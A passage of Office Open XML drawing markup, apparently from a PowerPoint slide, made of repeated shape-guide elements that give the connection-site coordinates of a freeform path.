              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 106694 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 232564 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 21820 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 106694 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 232564 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 21820 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 83085 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 232564 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 21820 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
